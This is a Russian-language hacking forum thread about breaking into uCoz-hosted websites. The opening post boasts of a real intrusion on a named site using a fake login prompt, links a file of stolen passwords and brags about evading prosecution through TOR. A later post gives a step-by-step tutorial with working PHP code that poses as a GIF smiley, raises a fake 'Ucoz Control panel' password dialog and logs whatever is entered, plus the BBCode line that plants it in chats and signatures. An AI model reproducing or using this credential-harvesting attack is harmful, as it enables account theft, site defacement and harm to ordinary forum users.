ВЗЛОМ сайта на юкозе
|
|
C@T | Дата: Воскресенье, 13.06.2010, 12:49 | Сообщение # 1 |
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
| ну сперва я прошу поздравить меня с моим первым взломом сайт- http://www.world-stalker.info/ ---------------------------------------- какой ущерб был нанесен: были удалены все сообщения на форуме были перебанены все админы и был удален весь дизайн ---------------------------------------- как ето было реализовано: сперва я зарегистрировал домен на бесплатном хостинге с поддержкой PHP, дальше я написал простенький скриптик который при запуске рисует смайлик и запускает диологовое окно которое просит ввести логин и пароль и сохраняет то что ввели в файл на сайте дальше я переименовую етот скрипт в CoolSmile.php (можно было и гиф но я не знал что надо было сделать чтобы он заработал ) дальше я зашел на сайтик и в мини чате вписал бб код типа [имг]http://everything.h1.ru/coolsmile.php[/имг] и у них появился смайлик и после авторизации на сайте у них выскакивало окно с просьбой ввести логин и пароль в итоге у меня появилась база их паролей ну и несколько паролей админов после етого я зашел под одним из админов и посмотрел имейлы всех админов (админов было всего два но было 5 аккаунтов с правами админов)потом я решил попробывать пароли от аккаунтов к их имейлов (начал создателя сайта) и я очень удивился когда пароль подошол после чего порылся по его мылу и нашол пароль от админ панели (админ когдато забыл пароль и ему он пришол на мыло ) на следующий день я и мой друг произвели атаку на сайт в итоге сайт пролежал 3 для с надписью Мы подверглись взлому и идут исправительные работы сегодня он вроде восстановлен но работает так себе так как форум почистили P.S если вы знаете админа этого сайта просьба не говорить ему кто его взломал так как он думает что его взломала какая то девка Файл с паролями здесь http://everything.h1.ru/passwords.txt (пароли админов не пашут так как они их поменяли) и все пароли там это пароли от юкозовских аккаунтов они собраны с сайта жертвы и с тех сайтов что были у него в друзьях
|
|
| |
opius | Дата: Воскресенье, 13.06.2010, 14:42 | Сообщение # 2 |
Частый гость
Зарегистрирован: 18.03.2010
Группа: Пользователи
Сообщений: 46
Статус: Offline
| 274 УК РФ не боишься ? а так молодец
Сообщение отредактировал opius - Воскресенье, 13.06.2010, 14:43 |
|
| |
C@T | Дата: Воскресенье, 13.06.2010, 15:43 | Сообщение # 3 |
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
| Quote (C@T) 274 УК РФ не боишься а чо тут боятся я действовал через прокси (TOR рулит )
|
|
| |
Marra_Kesh | Дата: Понедельник, 14.06.2010, 10:58 | Сообщение # 4 |
Постоянный
Зарегистрирован: 19.12.2009
Группа: Модераторы
Сообщений: 182
Статус: Offline
| C@T, поздравляю тебя, а данный способ подходит для любого сайта?
Заведующий палатой #6
|
|
| |
C@T | Дата: Понедельник, 14.06.2010, 18:00 | Сообщение # 5 |
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
| да можно сказать для любого главное чтобы были разрешены бб коды [имг][/имг] и чтобы были тупые юзеры которые отдадут свой пароль
|
|
| |
C@T | Дата: Понедельник, 14.06.2010, 18:09 | Сообщение # 6 |
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
| кстати если кому интересно то производится набор в команду "Unknown Avengers Team" кому интересно то стучите в аську 603702296
|
|
| |
XDXDXD | Дата: Четверг, 09.02.2012, 21:09 | Сообщение # 7 |
Новичок
Зарегистрирован: 16.10.2010
Группа: Пользователи
Сообщений: 4
Статус: Offline
| Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).
Итак, начнем... Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif). Затем откройте блокнот, да простой блокнот и напишите следующее:
code: header("Content-type: image/gif"); $image = imagecreatefromgif('cool.gif'); if(!$_COOKIE['LOGON']) { $login = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if(strlen($pass) <= 4 || !$login) { Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm="Ucoz Control panel"'); } elseif($login) { setcookie('LOGON',md5($pass)); $f = fopen('passwords.txt', 'ab'); fwrite($f, $login." ||| ".$pass."\r\n"); fclose($f); } } imagegif($image); imagedestroy($image); ?>
Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif. Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:
code: [img]http:mysite.phphost.net/smile.gif[img] И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появлятся форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появлятся тоже. И все, введеные логины и пароли в эту форму будут отсылатся в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп.
Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет =)))
Тема с сайта http://l1f3.ru/load/40-1-0-129
XP
|
|
| |
link993 | Дата: Четверг, 09.02.2012, 21:32 | Сообщение # 8 |
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
| Скажите, а этот способ только для сайтов юкоз? Можно ли где нибудь на форуме такой смайл встроить?
|
|
| |
Волк-1024 | Дата: Четверг, 09.02.2012, 21:43 | Сообщение # 9 |
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| link993, Да. Кста этот метод оооочень старый...
Pascal, C\C++, Assembler, Python
|
|
| |
link993 | Дата: Четверг, 09.02.2012, 21:46 | Сообщение # 10 |
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
| Волк, можешь поподробнее объяснить, а то я кроме делфи не шарю не в чем. Как это происходить будет?
|
|
| |
link993 | Дата: Четверг, 09.02.2012, 21:46 | Сообщение # 11 |
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
| Можно это как нить в подпись у форума встроить?
|
|
| |
Волк-1024 | Дата: Четверг, 09.02.2012, 22:01 | Сообщение # 12 |
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| link993, Да. Я только что на примере этого форума провел эту фишку. Если видел. Конечно. Я уже это убрал.
Pascal, C\C++, Assembler, Python
Сообщение отредактировал Волк-1024 - Четверг, 09.02.2012, 22:22 |
|
| |
Волк-1024 | Дата: Четверг, 09.02.2012, 22:15 | Сообщение # 13 |
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| Вот.
Pascal, C\C++, Assembler, Python
|
|
| |
Волк-1024 | Дата: Четверг, 09.02.2012, 22:20 | Сообщение # 14 |
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| Вот, что требуется для взлома. (Выдрал прямо со своего хоста)
P.S. Удалите кто-нить лишние посты.
Pascal, C\C++, Assembler, Python
Сообщение отредактировал Волк-1024 - Четверг, 09.02.2012, 22:23 |
|
| |
dolphin | Дата: Четверг, 09.02.2012, 23:25 | Сообщение # 15 |
Администратор
Сообщений: 906
Статус: Offline
| Вот поэтому у нас и нет миничата!
Система: Windows 10 x64, Kali Linux Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель Я не вредитель, я всего лишь теоретик
|
|
| |
Волк-1024 | Дата: Четверг, 09.02.2012, 23:50 | Сообщение # 16 |
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| dolphin, Такое можно куда угодно впихнуть. На форум, в подпись, миничат и т.д и т.п. Но я не думаю, что найдётся много дураков, которые поведутся на форму с требованием пароля. Хотя... Дураков много
Pascal, C\C++, Assembler, Python
|
|
| |
dolphin | Дата: Пятница, 10.02.2012, 00:10 | Сообщение # 17 |
Администратор
Сообщений: 906
Статус: Offline
| Да понятно что на форум можно, но миничат на главной всегда и на более видном месте
Система: Windows 10 x64, Kali Linux Среды программирования: Delphi 7, Delphi 10.x
Я не профессионал, я всего лишь любитель Я не вредитель, я всего лишь теоретик
|
|
| |
GReIIIHuK | Дата: Пятница, 10.02.2012, 11:54 | Сообщение # 18 |
Участник
Зарегистрирован: 15.05.2011
Группа: Пользователи
Сообщений: 98
Статус: Offline
| Насколько я знаю, ucoz система уже заблокировала данный способ. Теперь на сайте изначально(даже на сайтах типа: клан cs) нету BB кодов.
Skype:"greiiihuk." Да, я преступник. Мое преступление — любопытство. Быть может умру я, умрут многие, но идея останется жить навсегда. Я работаю не только за спасибо.(+) ©
|
|
| |
Волк-1024 | Дата: Пятница, 10.02.2012, 14:02 | Сообщение # 19 |
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| GReIIIHuK, Quote Насколько я знаю, ucoz система уже заблокировала данный способ. К сожалению или счастью этот способ нигде и ни когда не закрывали (например, этот форум). Я выше выложил скрин как такое провернуть на сдешнем форуме...
Pascal, C\C++, Assembler, Python
|
|
| |
GReIIIHuK | Дата: Суббота, 11.02.2012, 12:24 | Сообщение # 20 |
Участник
Зарегистрирован: 15.05.2011
Группа: Пользователи
Сообщений: 98
Статус: Offline
| Скажу честно, удивлен. Я пытался года 2-3 назад попробовать сделать что то подобное, но в мини-чате сразу же блокировало. Попробовать на форуме не подумал даже.
Skype:"greiiihuk." Да, я преступник. Мое преступление — любопытство. Быть может умру я, умрут многие, но идея останется жить навсегда. Я работаю не только за спасибо.(+) ©
|
|
| |
xXxSh@dowxXx | Дата: Понедельник, 13.02.2012, 00:16 | Сообщение # 21 |
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
| если я не ошибаюсь это все простой пример Активной XSS уязвимости с вызовом фейкового окна авторизации...
Сообщение отредактировал xXxSh@dowxXx - Понедельник, 13.02.2012, 00:59 |
|
| |
Волк-1024 | Дата: Понедельник, 13.02.2012, 15:18 | Сообщение # 22 |
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 469
Статус: Offline
| xXxSh@dowxXx, Оно самое.
Pascal, C\C++, Assembler, Python
|
|
| |
GReIIIHuK | Дата: Среда, 15.02.2012, 12:32 | Сообщение # 23 |
Участник
Зарегистрирован: 15.05.2011
Группа: Пользователи
Сообщений: 98
Статус: Offline
| Редко такое встретишь.Да и зачем нужен сайт такого муда*а, который такое допустит?)
Skype:"greiiihuk." Да, я преступник. Мое преступление — любопытство. Быть может умру я, умрут многие, но идея останется жить навсегда. Я работаю не только за спасибо.(+) ©
|
|
| |